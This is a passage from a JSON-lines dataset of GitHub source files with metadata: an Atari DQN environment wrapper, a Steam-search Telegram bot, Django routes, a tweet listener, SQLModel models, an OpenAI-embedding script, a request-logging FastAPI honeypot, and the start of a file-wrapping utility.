"crypto.coinFetcher", "line_number": 28, "usage_type": "call"}, {"api_name": "stocks.stockFetcher", "line_number": 36, "usage_type": "call"}, {"api_name": "stocks.afterHoursFetcher", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "9468537762", "text": "import sys\nimport os\nfrom ale_python_interface import ALEInterface\nimport cv2\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass Environment:\n def __init__(self, rom_file, args):\n self.ale = ALEInterface()\n if args.display_screen:\n if sys.platform == 'darwin':\n import pygame\n pygame.init()\n self.ale.setBool('sound', False) # Sound doesn't work on OSX\n elif sys.platform.startswith('linux'):\n self.ale.setBool('sound', True)\n self.ale.setBool('display_screen', True)\n\n self.ale.setInt('frame_skip', args.frame_skip)\n self.ale.setFloat('repeat_action_probability', args.repeat_action_probability)\n self.ale.setBool('color_averaging', args.color_averaging)\n\n if args.random_seed:\n self.ale.setInt('random_seed', args.random_seed)\n\n if args.record_screen_path:\n if not os.path.exists(args.record_screen_path):\n logger.info(\"Creating folder %s\" % args.record_screen_path)\n os.makedirs(args.record_screen_path)\n logger.info(\"Recording screens to %s\", args.record_screen_path)\n self.ale.setString('record_screen_dir', args.record_screen_path)\n\n if args.record_sound_filename:\n logger.info(\"Recording sound to %s\", args.record_sound_filename)\n self.ale.setBool('sound', True)\n self.ale.setString('record_sound_filename', args.record_sound_filename)\n\n self.ale.loadROM(rom_file)\n\n if args.minimal_action_set:\n self.actions = self.ale.getMinimalActionSet()\n logger.info(\"Using minimal action set with size %d\" % len(self.actions))\n else:\n self.actions = self.ale.getLegalActionSet()\n logger.info(\"Using full action set with size %d\" % len(self.actions))\n logger.debug(\"Actions: \" + str(self.actions))\n\n self.dims = (args.screen_height, args.screen_width)\n\n def numActions(self):\n return len(self.actions)\n\n def restart(self):\n self.ale.reset_game()\n\n def act(self, action):\n reward = self.ale.act(self.actions[action])\n return reward\n\n def getScreen(self):\n screen = self.ale.getScreenGrayscale()\n resized = cv2.resize(screen, self.dims)\n return resized\n\n def isTerminal(self):\n return self.ale.game_over()\n", "repo_name": "rickyHong/simple_dqn", "sub_path": "src/environment.py", "file_name": "environment.py", "file_ext": "py", "file_size_in_byte": 2188, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "ale_python_interface.ALEInterface", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.platform.startswith", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "18843669209", "text": "# coding: utf-8\n\nimport asyncio\nimport json\nimport re\nfrom datetime import datetime\nfrom urllib import parse\n\nimport aiohttp\nimport asyncio_redis\nimport telepot\nimport telepot.aio\nfrom telepot.namedtuple import ReplyKeyboardMarkup, ReplyKeyboardRemove\n\nfrom constants import GAME_CARD_TEMPLATE, NEWS_CARD_TEMPLATE, LANG, CC\nfrom utils import SearchSuggestParser, cache_steam_response, group\n\n\nclass SteamBot(telepot.aio.Bot, telepot.helper.AnswererMixin):\n\n def __init__(self, *args, config=None, **kwargs):\n super(SteamBot, self).__init__(*args, **kwargs)\n self._answerer = telepot.aio.helper.Answerer(self)\n self.config = config\n self.cache_time = self.config.get('cache_time', 10)\n self.redis_conn = None\n self.loop.create_task(self.initialize_redis())\n self.routes = {\n '/search': self.search_game,\n '/app_': self.game_card_answer,\n '/scr_': self.screenshots_answer,\n '/news_': self.last_news_answer,\n '/feedback': self.feedback_answer,\n '/settings': self.settings_answer,\n '/lang': self.set_lang,\n '/cc': self.set_cc,\n '/start': self.welcome_answer\n }\n\n async def initialize_redis(self):\n self.redis_conn = await asyncio_redis.Pool.create(\n host=self.config['redis']['ip'],\n port=self.config['redis']['port'],\n db=self.config['redis']['db'],\n poolsize=5\n )\n\n @cache_steam_response\n async def get_content_from_url(self, url, resp_format=None):\n async with aiohttp.ClientSession(loop=self.loop) as client:\n async with client.get(url) as resp:\n if resp.status != 200:\n return\n if resp_format == 'text':\n result = await resp.text()\n elif resp_format == 'json':\n result = await resp.json()\n else:\n result = await resp.content.read()\n return result\n\n async def get_search_results(self, term, settings):\n search_url = u'https://store.steampowered.com/search/suggest?term={}&f=games&l={}&cc={}'.format(\n parse.quote_plus(term),\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(search_url, resp_format='text')\n parser = SearchSuggestParser()\n parser.feed(content)\n return parser.result\n\n async def get_appdetails(self, appid, settings={}):\n url = u'https://store.steampowered.com/api/appdetails/?appids={}&l={}&cc={}'.format(\n appid,\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content[appid]['data'] if content else {}\n\n async def get_news(self, appid, count=3):\n url = u'https://api.steampowered.com/ISteamNews/GetNewsForApp/v0002/?appid={}&count={}&max_length=300&format=json'.format(\n appid,\n count\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content['appnews']['newsitems'] if content else {}\n\n @staticmethod\n def get_command(msg):\n if 'entities' in msg:\n for entity in msg['entities']:\n if entity['type'] == 'bot_command':\n offset, length = entity['offset'], entity['length']\n return msg['text'][offset:length], msg['text'][offset + length:].strip()\n return None, None\n\n @staticmethod\n def get_games_message(entries):\n msg_list = []\n if len(entries) != 0:\n for entry in entries:\n msg = u\"{cmd} {name} [steam]({href}) _{price}_\".format(\n name=entry['name'],\n href=entry['href'],\n price=entry['price'],\n cmd=u'/app\\_{}'.format(entry['appid'])\n )\n msg_list.append(msg)\n return u'\\n'.join(msg_list)\n return u'Nothing found'\n\n @staticmethod\n def clean_html(html):\n return re.sub('<[^<]+?>', '', html)\n\n @staticmethod\n def clean_markdown(text):\n 
return text.replace('_', '\\_').replace('*', '\\*')\n\n def get_game_card_message(self, appdetails):\n return GAME_CARD_TEMPLATE.format(\n appid=appdetails['steam_appid'],\n name=appdetails['name'],\n release_date=appdetails['release_date']['date'],\n metacritic=u'\\u2b50\\ufe0f{} [metacritics]({})'.format(\n appdetails['metacritic']['score'],\n appdetails['metacritic']['url']\n ) if 'metacritic' in appdetails else '',\n platforms=', '.join(\n [x[0] for x in appdetails['platforms'].items() if x[1]]),\n genres=', '.join(\n [x['description'] for x in appdetails['genres']]) if 'genres' in appdetails else '',\n publishers=', '.join(\n appdetails['publishers']) if 'publishers' in appdetails else '',\n price='{} {}'.format(appdetails['price_overview']['final'] / 100.0,\n appdetails['price_overview']['currency']) if 'price_overview' in appdetails else '',\n recommendations=appdetails['recommendations']['total'] if 'recommendations' in appdetails else '',\n screenshotscount=len(\n appdetails['screenshots']) if 'screenshots' in appdetails else '0',\n about_the_game=self.clean_html(appdetails['about_the_game'])[:500]\n )\n\n async def on_callback_query(self, msg):\n query_id, from_id, data = telepot.glance(msg, flavor='callback_query')\n print('Callback query:', query_id, from_id, data)\n self.route(from_id, data)\n\n async def game_search_answer(self, term, chat_id):\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n msg = self.get_games_message(await self.get_search_results(term, settings))\n await self.sendMessage(chat_id, msg, parse_mode='markdown', disable_web_page_preview=True)\n\n async def game_card_answer(self, chat_id, command, args):\n appid = command.replace('/app_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n app_details = await self.get_appdetails(appid, settings)\n await self.sendMessage(chat_id, self.get_game_card_message(app_details), parse_mode='markdown')\n\n async def send_photo_from_url(self, url, photo_name, chat_id):\n downloaded_file = await self.get_content_from_url(url)\n await self.sendPhoto(chat_id, photo=(photo_name, downloaded_file))\n\n async def screenshots_answer(self, chat_id, command, args):\n appid = command.replace('/scr_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'upload_photo'))\n app_details = await self.get_appdetails(appid)\n for scr in app_details['screenshots']:\n loop.create_task(self.send_photo_from_url(\n scr['path_full'], 'scr-{}.jpg'.format(scr['id']), chat_id))\n\n async def last_news_answer(self, chat_id, command, args):\n appid = command.replace('/news_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n news_items = await self.get_news(appid)\n for item in news_items:\n msg = NEWS_CARD_TEMPLATE.format(\n title=item['title'],\n url=item['url'],\n pub_date=datetime.fromtimestamp(\n int(item['date'])).strftime(\"%B %d, %Y\"),\n feedlabel=item['feedlabel'],\n contents=self.clean_markdown(self.clean_html(item['contents'])).replace(\n '\\n', '').replace(' ', '')[:300],\n author=item['author']\n )\n loop.create_task(self.sendMessage(\n chat_id, msg, parse_mode='markdown'))\n\n def get_user_key(self, user_id):\n return 'user-{}'.format(user_id)\n\n async def save_user_settings(self, user_id, new_settings):\n key = self.get_user_key(user_id)\n user = await self.get_user(user_id)\n settings = user.get('settings', {})\n settings.update(new_settings)\n 
user['settings'] = settings\n await self.redis_conn.set(key, json.dumps(user))\n\n async def get_user(self, user_id):\n return json.loads(await self.redis_conn.get(self.get_user_key(user_id)))\n\n async def create_or_update_user(self, chat):\n key = self.get_user_key(chat['id'])\n user = await self.redis_conn.get(key)\n if not user:\n new_user = chat\n default_settings = {\n 'lang': 'english',\n 'cc': 'US'\n }\n new_user_serialized = json.dumps(\n {'info': new_user, 'settings': default_settings})\n await self.redis_conn.set(key, new_user_serialized)\n else:\n user = json.loads(user)\n if chat != user['info']:\n user['info'] = chat\n await self.redis_conn.set(key, json.dumps(user))\n\n async def on_inline_query(self, msg):\n async def compute_answer():\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='inline_query')\n print('inline query: {} from_id: {}'.format(query_string, from_id))\n user_info = await self.get_user(from_id)\n settings = user_info.get('settings')\n results = await self.get_search_results(query_string, settings)\n articles = []\n for res in results:\n articles.append({\n 'type': 'article',\n 'id': res['appid'],\n 'title': res['name'],\n 'message_text': u'{} {} {}'.format(\n res['name'],\n res['price'],\n res['href']\n ),\n # 'url': res['href'],\n 'description': res['price'],\n 'thumb_url': res['image']\n })\n return {'results': articles}\n self._answerer.answer(msg, compute_answer)\n\n async def on_chosen_inline_result(self, msg):\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='chosen_inline_result')\n print('Chosen Inline Result: {} {} from_id: {}'.format(\n query_id, query_string, from_id))\n await self.game_card_answer(query_id, from_id)\n\n async def search_game(self, chat_id, command, args):\n await self.sendChatAction(chat_id, 'typing')\n await self.game_search_answer(args, chat_id)\n\n async def set_lang(self, chat_id, command, args):\n lang = args.strip() if args else None\n if lang:\n await self.save_user_settings(chat_id, {'lang': LANG.get(lang)})\n await bot.sendMessage(chat_id, 'language saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/lang' + x for x in LANG.keys()], 2),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set language', reply_markup=markup)\n\n async def set_cc(self, chat_id, command, args):\n cc = args.strip() if args else None\n if cc:\n await self.save_user_settings(chat_id, {'cc': CC.get(cc)})\n await bot.sendMessage(chat_id, 'region saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/cc' + x for x in CC.keys()], 3),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set region', reply_markup=markup)\n\n async def feedback_answer(self, chat_id, command, args):\n msg = args.replace('/feedback ', '').strip()\n if msg:\n await self.sendMessage(\n self.config.get('admin_id'),\n 'feedback from: {}: {}'.format(chat_id, msg)\n )\n await self.sendMessage(chat_id, 'thank you for your feedback!')\n else:\n await self.sendMessage(chat_id, 'looks like your feedback is empty!')\n\n async def settings_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n \"change region: /cc\\n\"\n \"change language: /lang\\n\"\n )\n\n async def welcome_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n 'Welcome! 
Just type / for view list of commands, also you can use this bot with inline mode.\\n'\n 'For search a game just send message with game title'\n )\n\n def route(self, chat_id, command, args=None):\n func = None\n for cmd, fnc in self.routes.items():\n if command.find(cmd) != -1:\n func = fnc\n break\n\n if func:\n self.loop.create_task(func(chat_id, command, args))\n\n async def on_chat_message(self, msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(msg)\n await self.create_or_update_user(msg.get('chat'))\n command, args = self.get_command(msg)\n if not command:\n command, args = '/search', msg['text']\n self.route(chat_id, command, args)\n\n\nwith open('conf/config.json') as f:\n config = json.loads(f.read())\n\nloop = asyncio.get_event_loop()\ntoken = config.pop(\"telegram_token\")\nbot = SteamBot(token=token, config=config, loop=loop)\nloop.create_task(bot.message_loop())\nprint('Listening ...')\nloop.run_forever()\n", "repo_name": "AyumuKasuga/steambot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 13818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "telepot.aio", "line_number": 19, "usage_type": "attribute"}, {"api_name": "telepot.helper", "line_number": 19, "usage_type": "attribute"}, {"api_name": "telepot.aio.helper.Answerer", "line_number": 23, "usage_type": "call"}, {"api_name": "telepot.aio", "line_number": 23, "usage_type": "attribute"}, {"api_name": "asyncio_redis.Pool.create", "line_number": 41, "usage_type": "call"}, {"api_name": "asyncio_redis.Pool", "line_number": 41, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.cache_steam_response", "line_number": 48, "usage_type": "name"}, {"api_name": "urllib.parse.quote_plus", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 64, "usage_type": "name"}, {"api_name": "utils.SearchSuggestParser", "line_number": 69, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE.format", "line_number": 123, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE", "line_number": 123, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 146, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE.format", "line_number": 181, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE", "line_number": 181, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 184, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 184, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 203, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 206, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 221, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 224, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 228, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 253, "usage_type": "call"}, {"api_name": "constants.LANG.get", "line_number": 266, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 266, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 267, "usage_type": "call"}, {"api_name": 
"telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG.keys", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 270, "usage_type": "name"}, {"api_name": "constants.CC.get", "line_number": 278, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 278, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 279, "usage_type": "call"}, {"api_name": "telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 281, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC.keys", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 282, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 323, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 335, "usage_type": "call"}]}
+{"seq_id": "43321434568", "text": "from django.conf.urls import url, include\n\nfrom . import views\n\n\napp_name = 'blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^createUser/$', views.createUser, name='createUser'),\n url(r'^registration/$', views.registration_page, name='registration_page'),\n url(r'^makepost/$', views.makepost, name='makepost'),\n url(r'^blogfeed/$', views.blogfeed, name='blogfeed'),\n url(r'^createposts/$', views.create_post, name='create_post'),\n url(r'^mylogin/$', views.mylogin, name='mylogin'),\n url(r'^logout_view/$', views.logout_view, name='logout_view'),\n url(r'^(?P[0-9]+)/$', views.singlepost, name='singlepost'),\n url(r'^savecomment/(?P[0-9]+)/$', views.savecomment, name='savecomment')\n]\n", "repo_name": "mschaeffer53/Marcel_CodeGuildPDX", "sub_path": "django/mainsite/blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "9205060333", "text": "import logging\n\nfrom responsebot.common.exceptions import UserHandlerException\n\n\nclass ResponseBotListener(object):\n \"\"\"\n Forward received tweets from :class:`~responsebot.responsebot_stream.ResponseBotStream`\n \"\"\"\n def __init__(self, handler_classes, client):\n \"\"\"\n Inits the listener and tries to create handler instances from discovered user's handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n :param client: Some Twitter API client for authentication. E.g. :class:`~responsebot.tweet_client.TweetClient`\n \"\"\"\n self.client = client\n self.handlers = []\n\n self.register_handlers(handler_classes)\n\n def register_handlers(self, handler_classes):\n \"\"\"\n Create handlers from discovered handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n \"\"\"\n for handler_class in handler_classes:\n try:\n self.handlers.append(handler_class(client=self.client))\n logging.info('Successfully registered {handler_class}'.format(handler_class=getattr(handler_class, '__name__', str(handler_class))))\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n\n def on_tweet(self, tweet):\n \"\"\"\n Callback to receive tweet from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the\n received tweet to registered handlers.\n\n :param tweet: An object containing a tweet's text and metadata\n :type tweet: :class:`~responsebot.models.Tweet`\n :raises :class:`~responsebot.common.exceptions.UserHandlerException`: If there is some unknown error from a custom handler\n \"\"\"\n logging.info('Received tweet: `{message}`'.format(message=tweet.text))\n\n for handler in self.handlers:\n try:\n handler.on_tweet(tweet)\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n", "repo_name": "anhhuy1605/test_rtd", "sub_path": "responsebot/listeners/responsebot_listener.py", "file_name": "responsebot_listener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "70325733608", "text": "from datetime import datetime\nfrom enum import Enum\nfrom typing import Optional\n\nfrom pydantic import BaseModel\nfrom sqlmodel import Column, DateTime, Field, ForeignKey, SQLModel\n\n\nclass TodoListBase(SQLModel):\n title: str\n description: str\n\n\nclass TodoListCreate(TodoListBase):\n pass\n\n\nclass TodoListUpdate(BaseModel):\n title: Optional[str] = None\n description: Optional[str] = None\n\n\nclass TodoList(TodoListBase, table=True):\n __tablename__ = \"todo_list\"\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: Optional[int] = Field(\n default=None, sa_column=Column(ForeignKey(\"user.id\", ondelete=\"CASCADE\"))\n )\n created_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n updated_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n\n\nclass TodoListSortingFields(str, Enum):\n id = \"id\"\n title = \"title\"\n created_date = \"created_date\"\n updated_date = \"updated_date\"\n", "repo_name": "testownik-pwr-portal/portal", "sub_path": "backend/app/app/models/todo_list.py", "file_name": "todo_list.py", "file_ext": "py", "file_size_in_byte": 1055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.SQLModel", "line_number": 9, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlmodel.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "16271165720", "text": "import requests\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\npersonal_api_key = os.getenv(\"PERSONAL_API_KEY\")\nopen_ai_api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\n\ndef get_token():\n payload = {\"apikey\": personal_api_key}\n response = requests.post('https://zadania.aidevs.pl/token/embedding', json=payload)\n return response.json().get('token')\n\n\ndef create_embedding():\n token = get_token()\n data = {\"input\": 'Hawaiian pizza', \"model\": \"text-embedding-ada-002\"}\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + open_ai_api_key}\n response = requests.post('https://api.openai.com/v1/embeddings', json=data, headers=headers)\n embedding = response.json()['data'][0]['embedding']\n return embedding, token\n\n\ndef send_answer():\n embedding, token = create_embedding()\n payload = {\"answer\": embedding}\n response = requests.post(f'https://zadania.aidevs.pl/answer/{token}', json=payload)\n return response.json()\n\n\nprint(send_answer())\n", "repo_name": "bartoszc/AI_Devs", "sub_path": "embedding.py", "file_name": "embedding.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 14, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "603120841", "text": "import uvicorn as uvicorn\nimport json\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom starlette.routing import Match\nfrom loguru import logger\n\nimport os\nimport shutil\n\n# Serve our static web portal\nfrom starlette.templating import Jinja2Templates\nfrom starlette.routing import Route, Mount\nfrom starlette.exceptions import HTTPException\n\ntemplates = Jinja2Templates(directory='webapp')\nasync def not_found(request: Request, exc: HTTPException):\n return RedirectResponse(\"/index.html\")\n\nexception_handlers = {\n 404: not_found\n}\n\napp = FastAPI(openapi_url=None, exception_handlers=exception_handlers)\nshared_honeypot_dir = \"/custom_honey\"\nshared_storage_dir = \"/honey_store\"\n# Might have some static file caching issue\napp.mount(\"/\", StaticFiles(directory=f\"{shared_honeypot_dir}/webapp\", html=True, check_dir=False), name=\"webapp\")\n\n@app.middleware(\"http\")\nasync def log_middle(request: Request, call_next):\n\n # Copy Default Honeypot if folder is empty\n if os.path.isdir(f\"{shared_honeypot_dir}/webapp\") and len(os.listdir(f\"{shared_honeypot_dir}/webapp\")) == 0:\n os.rmdir(f\"{shared_honeypot_dir}/webapp\")\n shutil.copytree(\"/app/webapp\", f\"{shared_honeypot_dir}/webapp\")\n\n routes = request.app.router.routes\n send_param = None\n for route in routes:\n match, scope = route.matches(request)\n if match == Match.FULL:\n send_param = list(scope[\"path_params\"].items())\n\n send_head = request.headers.items()\n send_body = (await request.body()).decode(\"utf-8\")\n packed_boi = {\"method\":request.method,\"url\":str(request.url),\"param\":send_param,\"headers\":send_head,\"body\":send_body}\n packed_json = json.dumps(packed_boi)\n\n with open(f\"{shared_storage_dir}/fastpotlogs.json\", 'a+') as outfile:\n outfile.write(\"\\n\")\n outfile.write(packed_json)\n\n response = await call_next(request)\n return response\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host='0.0.0.0', port=8000)\n\n", "repo_name": "FA-PengFei/NGWAF", "sub_path": "ngwaf-app/fastpot/fastpotty/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "53", "api": [{"api_name": "starlette.templating.Jinja2Templates", "line_number": 17, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 18, "usage_type": "name"}, {"api_name": "starlette.exceptions.HTTPException", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.FastAPI", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi.staticfiles.StaticFiles", "line_number": 29, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 36, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 37, "usage_type": "call"}, {"api_name": "starlette.routing.Match.FULL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "starlette.routing.Match", "line_number": 43, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, 
{"api_name": "uvicorn.run", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "9343915340", "text": "\"\"\"\nA collection of utilities for file wrapping.\n\nNote: This is a work in progress.\n\"\"\"\n\n\nimport re\n\ntry:\n import pyparsing\n from pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \\\n TokenConverter, Word, nums, oneOf, printables, ParserElement, alphanums\nexcept ImportError:\n pyparsing = None\n TokenConverter = object\n\nimport numpy as np\n\n\ndef _getformat(val):\n \"\"\"\n Get the output format for a floating point number.\n\n The general format is used with 16 places of accuracy, except for when\n the floating point value is an integer, in which case a decimal point\n followed by a single zero is used.\n\n Parameters\n ----------\n val : float or int\n the number which needs formatted.\n\n Returns\n -------\n string\n the format string.\n \"\"\"\n if int(val) == val:\n return \"%.1f\"\n else:\n return \"%.16g\"\n\n\nclass _SubHelper(object):\n \"\"\"\n Replaces file text at the correct word location in a line.\n\n This class contains the Helper Function that is passed to re.sub.\n\n Attributes\n ----------\n _newtext : str\n text to insert.\n _replace_location : int\n location in the file where replacement is to occur.\n _current_location : int\n current location in the file.\n _counter : int\n counter\n _start_location : int\n initial location where replacement is to occur.\n _end_location : int\n final location where replacement is to occur.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n self._newtext = \"\"\n self._replace_location = 0\n self._current_location = 0\n self._counter = 0\n self._start_location = 0\n self._end_location = 0\n\n def set(self, newtext, location):\n \"\"\"\n Set a new word location and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n location : int\n location in the file where replacement is to occur.\n \"\"\"\n self._newtext = newtext\n 